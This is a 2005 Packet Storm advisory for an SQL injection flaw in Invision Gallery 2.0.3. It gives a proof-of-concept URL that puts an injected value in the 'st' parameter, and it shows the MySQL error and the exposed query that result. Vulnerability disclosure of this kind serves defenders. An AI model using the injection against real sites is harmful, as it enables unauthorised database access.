invision203-SQL.txt

2005-11-01T00:00:00
ID PACKETSTORM:41090
Type packetstorm
Reporter aLMaSTeR
Modified 2005-11-01T00:00:00

Description

                                        
                                            `Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]  
  
Vulnerable: Invision Gallery 2.0.3  
  
EXPLIOT:  
  
http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR  
  
The Error:  
  
mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated   
FROM ibf_gallery_images i   
LEFT JOIN ibf_members m ON ( m.id=i.member_id )   
LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )   
WHERE category_id=26 AND i.approved=1   
GROUP BY i.id   
ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20   
  
  
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 7   
SQL error code:   
Date: Sunday 30th of October 2005 04:53:19 PM   
  
Thanks TO MY FRIENDS IN S4A.CC  
  
almaster@s4a.cc or almaster@hotmail.com  
`